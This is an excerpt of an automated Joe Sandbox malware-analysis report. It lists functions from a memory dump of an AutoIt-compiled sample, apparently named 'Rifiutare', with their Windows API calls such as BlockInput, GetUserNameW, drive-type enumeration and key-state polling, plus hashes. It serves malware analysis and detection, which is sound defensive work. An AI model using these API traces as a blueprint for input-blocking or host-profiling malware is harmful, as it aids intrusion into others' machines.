Opcode Fuzzy Hash: 2b5e25f0f92ff97c3b3675941da10a56c947a81e2417da2986deca57b2c2fa2e
Instruction Fuzzy Hash: 2F31D57490121C9BCB21DF64D989B9DBBB8BF08310F5045EAE81CA6261E7709FC59F45

Function 00C9EB90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C9EBC4

Strings

DOWN, xrefs: 00C9EBA9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 2de210ae326556af63f4c7141445b2da1d8330d0c7beb8f9a1befeeb22a20352
Instruction ID: 1ccc3ccc13e1682c8600ef6b83ca907c8bed1ca0bd659cf3696668ad3402312b
Opcode Fuzzy Hash: 2de210ae326556af63f4c7141445b2da1d8330d0c7beb8f9a1befeeb22a20352
Instruction Fuzzy Hash: A6E0CD6A19D7353DBD4821187C07EF7034C9B32335B210156FC11E50C0ED841DC661AD

Function 00C8E419 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C8E42B

Strings

X64, xrefs: 00C8E447

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: c3833a925fc9ebcca633bce63ed609422191d87f7a127e5de59c48a6be388a86
Instruction ID: db11792de87683e932d91198035fdd1fde8be64bfeb320de676f97b794e9312b
Opcode Fuzzy Hash: c3833a925fc9ebcca633bce63ed609422191d87f7a127e5de59c48a6be388a86
Instruction Fuzzy Hash: 25D0C9B480111DEACB90CB91DC88EDE777CBB04308F104555F506E2000D77095498B10

Function 00CAF2E8 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00CAF303

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: b169a1a2ce1a3d47975bdcd037a4e84b8faa7b2ab7c3772ec11afcb0d6e64737
Instruction ID: 7f653aa9d4ea6b6e673d70c5a481b9084bfde65c33b54d704777f481d0ff18b9
Opcode Fuzzy Hash: b169a1a2ce1a3d47975bdcd037a4e84b8faa7b2ab7c3772ec11afcb0d6e64737
Instruction Fuzzy Hash: 3DE0D8322102015FCB10AF5AD440E8AF7D8AF55360F00802AF84AC7310CA70E941CB90

Function 00C50DF5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020E01,00C5080E), ref: 00C50DFA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 350dc5961194657ecb5dd3b59b3641bc6d6d7c82b0b942bcc2b5a98d13a8448d
Instruction ID: f4f6d46614fe38102095e71030670cb7c0e6a83a5b75aaea14f492071e8c09f7
Opcode Fuzzy Hash: 350dc5961194657ecb5dd3b59b3641bc6d6d7c82b0b942bcc2b5a98d13a8448d
Instruction Fuzzy Hash:

Function 00CB32B1 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CB3303
DeleteObject.GDI32(00000000), ref: 00CB3316
DestroyWindow.USER32 ref: 00CB3325
GetDesktopWindow.USER32 ref: 00CB3340
GetWindowRect.USER32(00000000), ref: 00CB3347
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00CB3476
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00CB3484
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB34CB
GetClientRect.USER32(00000000,?), ref: 00CB34D7
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CB3513
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3535
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3548
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3553
GlobalLock.KERNEL32(00000000), ref: 00CB355C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB356B
GlobalUnlock.KERNEL32(00000000), ref: 00CB3574
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB357B
GlobalFree.KERNEL32(00000000), ref: 00CB3586
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3598
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CD0BFC,00000000), ref: 00CB35AE
GlobalFree.KERNEL32(00000000), ref: 00CB35BE
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00CB35E4
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00CB3603
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3625
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3812

Strings

DISPLAY, xrefs: 00CB3675
AutoIt v3, xrefs: 00CB34C5
, xrefs: 00CB3798
static, xrefs: 00CB350D, 00CB3664

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 68664e9853954f2b367dc5da8d706a155ffbc48aa5f1641f5c321bc3739f0be2
Instruction ID: 35f12efdf5c3cd8cba262b1d322562073fc59c9f4bd429a602b312138f00474c
Opcode Fuzzy Hash: 68664e9853954f2b367dc5da8d706a155ffbc48aa5f1641f5c321bc3739f0be2
Instruction Fuzzy Hash: AB025D71900215AFDB14DF64CD89FAE7BB9FB49710F048569F916AB2A0CB74EE01CB60

Function 00CC76BC Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00CC7716
GetSysColorBrush.USER32(0000000F), ref: 00CC7747
GetSysColor.USER32(0000000F), ref: 00CC7753
SetBkColor.GDI32(?,000000FF), ref: 00CC776D
SelectObject.GDI32(?,?), ref: 00CC777C
InflateRect.USER32(?,000000FF,000000FF), ref: 00CC77A7
GetSysColor.USER32(00000010), ref: 00CC77AF
CreateSolidBrush.GDI32(00000000), ref: 00CC77B6
FrameRect.USER32(?,?,00000000), ref: 00CC77C5
DeleteObject.GDI32(00000000), ref: 00CC77CC
InflateRect.USER32(?,000000FE,000000FE), ref: 00CC7817
FillRect.USER32(?,?,?), ref: 00CC7849
GetWindowLongW.USER32(?,000000F0), ref: 00CC786B

Part of subcall function 00CC79CF: GetSysColor.USER32(00000012), ref: 00CC7A08
Part of subcall function 00CC79CF: SetTextColor.GDI32(?,00CC76DC), ref: 00CC7A0C
Part of subcall function 00CC79CF: GetSysColorBrush.USER32(0000000F), ref: 00CC7A22
Part of subcall function 00CC79CF: GetSysColor.USER32(0000000F), ref: 00CC7A2D
Part of subcall function 00CC79CF: GetSysColor.USER32(00000011), ref: 00CC7A4A
Part of subcall function 00CC79CF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CC7A58
Part of subcall function 00CC79CF: SelectObject.GDI32(?,00000000), ref: 00CC7A69
Part of subcall function 00CC79CF: SetBkColor.GDI32(?,?), ref: 00CC7A72
Part of subcall function 00CC79CF: SelectObject.GDI32(?,?), ref: 00CC7A7F
Part of subcall function 00CC79CF: InflateRect.USER32(?,000000FF,000000FF), ref: 00CC7A9E
Part of subcall function 00CC79CF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CC7AB5
Part of subcall function 00CC79CF: GetWindowLongW.USER32(?,000000F0), ref: 00CC7AC2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f51eab20abbf5bffed6cf06b6921cb9503745f50758c2a5ceaea612c514bf434
Instruction ID: 14d1ef52c60189ac19875f7509c4a59c67abfefa6feddd0d00e4759bba2c00f7
Opcode Fuzzy Hash: f51eab20abbf5bffed6cf06b6921cb9503745f50758c2a5ceaea612c514bf434
Instruction Fuzzy Hash: A6A14B72008305AFDB119F64DC48F6EBBA9FB49325F140A29FAA3A61E0D771D944CF51

Function 00C36799 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00C36828
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C75013
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C7504C
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C75491

Part of subcall function 00C3670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C316CD,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C36772

SendMessageW.USER32(?,00001053), ref: 00C754CD
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C754E4
ImageList_Destroy.COMCTL32(00000000,?), ref: 00C754FA
ImageList_Destroy.COMCTL32(00000000,?), ref: 00C75505

Strings

0, xrefs: 00C7531D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5a498243df0e1b88a4e72386262793be0a5fa250ac5b1bb4f77365e15032c30f
Instruction ID: 03dd06a359cb84bc4e1ad2fb8becb6930b2a71f6e279506bafd8b44429218887
Opcode Fuzzy Hash: 5a498243df0e1b88a4e72386262793be0a5fa250ac5b1bb4f77365e15032c30f
Instruction Fuzzy Hash: DC12BF30601A01AFC725CF14D848B69BBE1FB48311F54C469F4A9CB2A2C7B1ED92DF91

Function 00CB2F4D Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 288windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00CB2F80
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CB304B
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CB3089
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00CB3099
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00CB30DF
GetClientRect.USER32(00000000,?), ref: 00CB30EB
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CB3132
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB3141
GetStockObject.GDI32(00000011), ref: 00CB3151
SelectObject.GDI32(00000000,00000000), ref: 00CB3155
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00CB3165
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB316E
DeleteDC.GDI32(00000000), ref: 00CB3177
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CB31A3
SendMessageW.USER32(00000030,00000000,00000001), ref: 00CB31BA
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CB31F5
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CB3209
SendMessageW.USER32(00000404,00000001,00000000), ref: 00CB321A
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CB324A
GetStockObject.GDI32(00000011), ref: 00CB3255
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CB3260
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00CB326A

Strings

DISPLAY, xrefs: 00CB3137
msctls_progress32, xrefs: 00CB31EB
AutoIt v3, xrefs: 00CB30D7
static, xrefs: 00CB312C, 00CB3244

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: f2d961d75ca7050c610759a9abdfac7a0122346ea1fa294c7e689d9afe15ff6a
Instruction ID: 888fecc7e43f77f06c46524fad94d77da43ba4bb04616c009b3569c051ba1914
Opcode Fuzzy Hash: f2d961d75ca7050c610759a9abdfac7a0122346ea1fa294c7e689d9afe15ff6a
Instruction Fuzzy Hash: B0A14D71A50215AFEB14DFA4DC4AFAF7BB9EB48710F008119FA15EB2E0D674AD00CB64

Function 00CA53F6 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CA5404
GetDriveTypeW.KERNEL32(?,00CCDB10,?,\\.\,00CCDBF4), ref: 00CA54E1
SetErrorMode.KERNEL32(00000000,00CCDB10,?,\\.\,00CCDBF4), ref: 00CA564D

Strings

FileBackedVirtual, xrefs: 00CA5603
Virtual, xrefs: 00CA55FC
RAID, xrefs: 00CA55D2
iSCSI, xrefs: 00CA55D9
SAS, xrefs: 00CA55E0
CDROM, xrefs: 00CA5512
1394, xrefs: 00CA55B6
Fixed, xrefs: 00CA5520
ATAPI, xrefs: 00CA55A8
RAMDisk, xrefs: 00CA550B
Unknown, xrefs: 00CA5504, 00CA559A
SCSI, xrefs: 00CA55A1
SSD, xrefs: 00CA5561
SATA, xrefs: 00CA55E7
SSA, xrefs: 00CA55BD
MMC, xrefs: 00CA55F5
PhysicalDrive, xrefs: 00CA548D
Network, xrefs: 00CA5519
Removable, xrefs: 00CA5527, 00CA552C
USB, xrefs: 00CA55CB
Fibre, xrefs: 00CA55C4
\\.\, xrefs: 00CA5456
ATA, xrefs: 00CA55AF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ec376bea622dc40e379b5dac91ea014962a5e2ceb2f31bfce22beebd89cf8f2f
Instruction ID: 427de5f293e96977469d7b7bee381979736f8cc1c72723e713b7b009d0d0b23c
Opcode Fuzzy Hash: ec376bea622dc40e379b5dac91ea014962a5e2ceb2f31bfce22beebd89cf8f2f
Instruction Fuzzy Hash: 0461E470648A0AAFCB54DF25C9829BC77B1BF16308BA4C165F506AB392C731EE41DB52

Function 00CC79CF Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00CC7A08
SetTextColor.GDI32(?,00CC76DC), ref: 00CC7A0C
GetSysColorBrush.USER32(0000000F), ref: 00CC7A22
GetSysColor.USER32(0000000F), ref: 00CC7A2D
CreateSolidBrush.GDI32(?), ref: 00CC7A32
GetSysColor.USER32(00000011), ref: 00CC7A4A
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CC7A58
SelectObject.GDI32(?,00000000), ref: 00CC7A69
SetBkColor.GDI32(?,?), ref: 00CC7A72
SelectObject.GDI32(?,?), ref: 00CC7A7F
InflateRect.USER32(?,000000FF,000000FF), ref: 00CC7A9E
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CC7AB5
GetWindowLongW.USER32(?,000000F0), ref: 00CC7AC2
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CC7B11
GetWindowTextW.USER32(?,00000000,00000001), ref: 00CC7B3B
InflateRect.USER32(?,000000FD,000000FD), ref: 00CC7B59
DrawFocusRect.USER32(?,?), ref: 00CC7B64
GetSysColor.USER32(00000011), ref: 00CC7B75
SetTextColor.GDI32(?,00000000), ref: 00CC7B7D
DrawTextW.USER32(?,00CC76DC,000000FF,?,00000000), ref: 00CC7B8F
SelectObject.GDI32(?,?), ref: 00CC7BA6
DeleteObject.GDI32(?), ref: 00CC7BB1
SelectObject.GDI32(?,?), ref: 00CC7BB7
DeleteObject.GDI32(?), ref: 00CC7BBC
SetTextColor.GDI32(?,?), ref: 00CC7BC2
SetBkColor.GDI32(?,?), ref: 00CC7BCC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f67b44dc7417f0b85d659581c8d1da99933c0597892f1ccb2ec492d50b1f9aa0
Instruction ID: c969e26f74f55c459059f56cc987dec28f4630d137f82a556917ecf2e46efaa2
Opcode Fuzzy Hash: f67b44dc7417f0b85d659581c8d1da99933c0597892f1ccb2ec492d50b1f9aa0
Instruction Fuzzy Hash: 91613E72904218AFDF019FA4DC49FEEBB79EB08320F154225F916AB2A0D7719A40DF90

Function 00CC1709 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 275windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00CC182B
GetDesktopWindow.USER32 ref: 00CC1840
GetWindowRect.USER32(00000000), ref: 00CC1847
GetWindowLongW.USER32(?,000000F0), ref: 00CC189C
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC18D5
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC18F3
DestroyWindow.USER32(?), ref: 00CC1911
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC1933
SendMessageW.USER32(?,00000421,?,?), ref: 00CC1948
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC195B
IsWindowVisible.USER32(?), ref: 00CC197B
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC1996
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC19AA
GetWindowRect.USER32(?,?), ref: 00CC19C2
MonitorFromPoint.USER32(?,?,00000002), ref: 00CC19E8
GetMonitorInfoW.USER32(00000000,?), ref: 00CC1A02
CopyRect.USER32(?,?), ref: 00CC1A19
SendMessageW.USER32(?,00000412,00000000), ref: 00CC1A84

Strings

tooltips_class32, xrefs: 00CC18CE
(, xrefs: 00CC19F5
0, xrefs: 00CC17D6

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 2509cb818ae15bb3a631ae51143b4bc7b276f737a287350c5ed9056b6a0b5407
Instruction ID: 0766f2fdf7826e61c0c7240d53afba281c9eb32f4109fdca2d59d530b584ea62
Opcode Fuzzy Hash: 2509cb818ae15bb3a631ae51143b4bc7b276f737a287350c5ed9056b6a0b5407
Instruction Fuzzy Hash: 65B15971608341AFD714DF65C884F6ABBE4FF89310F04891CF99AA72A2C770D905DB92

Function 00C3243E Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C32515
GetSystemMetrics.USER32(00000007), ref: 00C3251D
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C32548
GetSystemMetrics.USER32(00000008), ref: 00C32550
GetSystemMetrics.USER32(00000004), ref: 00C32575
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C32592
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C325A2
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C325D5
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C325E9
GetClientRect.USER32(00000000,000000FF), ref: 00C32607
GetStockObject.GDI32(00000011), ref: 00C32623
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3262E

Part of subcall function 00C31976: GetCursorPos.USER32(?), ref: 00C3198A
Part of subcall function 00C31976: ScreenToClient.USER32(00000000,?), ref: 00C319A7
Part of subcall function 00C31976: GetAsyncKeyState.USER32(00000001), ref: 00C319CC
Part of subcall function 00C31976: GetAsyncKeyState.USER32(00000002), ref: 00C319E6

SetTimer.USER32(00000000,00000000,00000028,00C31945), ref: 00C32655

Strings

AutoIt v3 GUI, xrefs: 00C325CD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
